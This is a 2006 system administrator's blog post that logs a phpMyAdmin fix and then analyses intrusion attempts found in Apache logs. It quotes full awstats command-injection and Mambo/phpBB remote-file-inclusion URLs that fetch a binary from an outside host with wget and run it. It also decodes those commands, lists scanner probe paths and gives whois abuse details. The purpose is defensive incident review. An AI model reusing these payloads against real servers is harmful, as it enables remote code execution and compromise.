SYSMGR

We're a bunch of Computers: Diana, Daphne, and Dido, called the 3D-cluster, running OpenVMS, Io running OpenVMS as well (in some obscure role in the network) Aphrodite, Athene and Irene running WindowsXP-Pro (SP2, of course) and Cerberus at the edge of the Network, with Charon, also running Linux, as standby. SYSMGR takes care of us.

Tuesday, March 28

28-Mar-2006

PHPMyAdmin works
That is: issue located and created a work-around: It's in the URL; that contains - in it's end - the string:
&collation_connection=utf8_unicode_ci
and that's just what give sthe error.
Changed that - in the browser address line - to read:
&collation_connection=utf8_general_ci
and behold: IT WORKS. No matter from where (Don't think you can access it - it's somewhere else ;-)
Switching time
this weekend has once again proved to be a non-issue.
Too busy with other things
but just this moring could watch the Apache logs. Found just two abuse attempts in ACCESS_LOG:

69.13.213.69 - - [22/Mar/2006:03:24:02 +0100]
GETs these URLs , at least: tries to (but gets 404-errors on each):

/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo/cgi-bin/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/cgi-bin/awstats/awstats.pl?configdir=echo;echo%20YYY;cd%20%2ftmp%3bwget%2083%2e16%2e187%2e6%2fcacti%3bchmod%20%2bx%20cacti%3b%2e%2fcacti;echo%20YYY;echo
/index.php?option=com_content&do_pdf=1&id=1index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/mambo/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/cvs/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://83.16.187.6/cmd.gif?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/modules/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/Forums/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo
/phpBB2/admin_styles.php?phpbb_root_path=http://83.16.187.6/cmd.dat?&cmd=cd%20/tmp;wget%2083.16.187.6/cacti;chmod%20744%20cacti;./cacti;echo%20YYY;echo

He's bsuy hacking his way in", because this is his command in plain text:

on "awstats" he does:

echo;
echo YYY;
cd /tmp;
wget 83.16.187.6/cacti;
chmod :x cacti;
./cacti;
echo YYY;
echo

on the other lines:

http://83.16.187.6/cmd.gif?&cmd=
cd /tmp;
wget 83.16.187.6/cacti;
chmod 744 cacti;
./cacti;
echo YYY;
echo

Actually the same.
Who is this:

The source is 69.13.213.69:

OrgName: C I Host
OrgID: CIHS
Address: 1851 Central Drive
Address: #110
City: Bedford
StateProv: TX
PostalCode: 76112
Country: US

NetRange: 69.13.0.0 - 69.13.255.255
CIDR: 69.13.0.0/16
NetName: CIHS
NetHandle: NET-69-13-0-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: NS.CIHOST.COM
NameServer: NS2.CIHOST.COM
Comment:
RegDate: 2002-12-04
Updated: 2003-10-10

RTechHandle: NC61-ARIN
RTechName: Network Operations Center
RTechPhone: +1-888-868-9931
RTechEmail: noc@cihost.com

OrgAbuseHandle: ABUSE821-ARIN
OrgAbuseName: Abuse
OrgAbusePhone: +1-888-868-9931
OrgAbuseEmail: abuse@cihost.com

But he references 83.16.187.6 (in the URL) si I guess it's likely to be his "home address" :

inetnum: 83.16.187.4 - 83.16.187.7
netname: PRZEDSIBIORSTWOT
descr: PRZEDSIEBIORSTWO TELNET
descr: LOMZA
descr: POLAND
country: PL
admin-c: PZ823-RIPE
tech-c: TPHT
status: ASSIGNED PA
mnt-by: TPNET
source: RIPE # Filtered

role: TP S.A. Hostmaster
address: TP S.A. "POLPAK"
address: ul. Nowogrodzka 47A
address: 00-695 Warszawa
address: Poland
phone: +48 22 6252383
fax-no: +48 22 6225182
remarks: trouble: Network problems: hostmaster@tpnet.pl
remarks: trouble: Abuse and spam notification: abuse@tpnet.pl
remarks: trouble: DNS problems: dns@tpnet.pl
remarks: trouble: Routing problems: registry@tpnet.pl
admin-c: TK569-RIPE
tech-c: TK569-RIPE
tech-c: JS1838-RIPE
nic-hdl: TPHT
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
remarks: Please send spam and abuse notification only to abuse@tpnet.pl
remarks: ! - ! - ! - ! - ! - ! - ! - ! - ! - ! - !
mnt-by: TPNET
abuse-mailbox: abuse@tpnet.pl
source: RIPE # Filtered

Both will be notified.

The second is more straightforward - and a good proven NOT to install on default locations:

85.10.193.134 - - [26/Mar/2006:21:16:33 +0200] "GET /thisdoesnotexistahaha.php HTTP/1.1" 404 316

no, of course not. Nor do these:

/modules/newbb_plus/class/forumpollrenderer.php
/WebCalendar/tools/send_reminders.php
/webcalendar/tools/send_reminders.php
/cal/tools/send_reminders.php
/Calendar/tools/send_reminders.php
/calendar/tools/send_reminders.php
/protection.php
/modules/AllMyGuests/signin.php
/classes.php
/extensions/moblog/moblog_lib.php
/modules/newbb_plus/class/forumpollrenderer.php
/mambo/index2.php?option=com_content&do_pdf=1&id=1
/mambo/index.php?option=com_content&do_pdf=1&id=1
/index2.php?option=com_content&do_pdf=1&id=1
/index.php?option=com_content&do_pdf=1&id=1
/cvs/index2.php?option=com_content&do_pdf=1&id=1
/cvs/index.php?option=com_content&do_pdf=1&id=1
/modules/coppermine/themes/default/theme.php
/awstats.pl
/cgi-bin/awstats.pl
/scgi-bin/awstats.pl
/awstats/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi/awstats/awstats.pl
/scgi/awstats/awstats.pl
/scripts/awstats.pl
/cgi-bin/awstats/awstats.pl
/scgi-bin/awstats/awstats.pl
/cgi-bin/stats/awstats.pl
/scgi-bin/stats/awstats.pl
/stats/awstats.pl
/blog/xmlrpc.php
/blog/xmlsrv/xmlrpc.php
/blogs/xmlsrv/xmlrpc.php
/drupal/xmlrpc.php
/phpgroupware/xmlrpc.php
/wordpress/xmlrpc.php
/xmlrpc.php
/xmlrpc/xmlrpc.php
/xmlsrv/xmlrpc.php
/services/xmlrpc.php
/html/xmlrpc.php

This source is:

inetnum: 85.10.192.0 - 85.10.207.255
netname: HETZNER-RZ-NBG-NET
descr: Hetzner Online AG
descr: Datacenter Nuernberg
country: DE
admin-c: HOAC1-RIPE
tech-c: HOAC1-RIPE
status: ASSIGNED PA
mnt-by: HOS-GUN
mnt-lower: HOS-GUN
mnt-routes: HOS-GUN
source: RIPE # Filtered

role: Hetzner Online AG - Contact Role
address: Hetzner Online AG
address: Industriestr. 6
address: D-91710 Gunzenhausen
address: Germany
phone: +49 9831 61 00 61
fax-no: +49 9831 61 00 62
e-mail: ripe@hetzner.de
remarks: *************************************************
remarks: * For spam/abuse/security issues please contact *
remarks: * abuse@hetzner.de , not this address *
remarks: *************************************************

Again a notification to be sent.

posted by SYSMGR @ 12:00 AM 

0 Comments:

Post a Comment

<< Home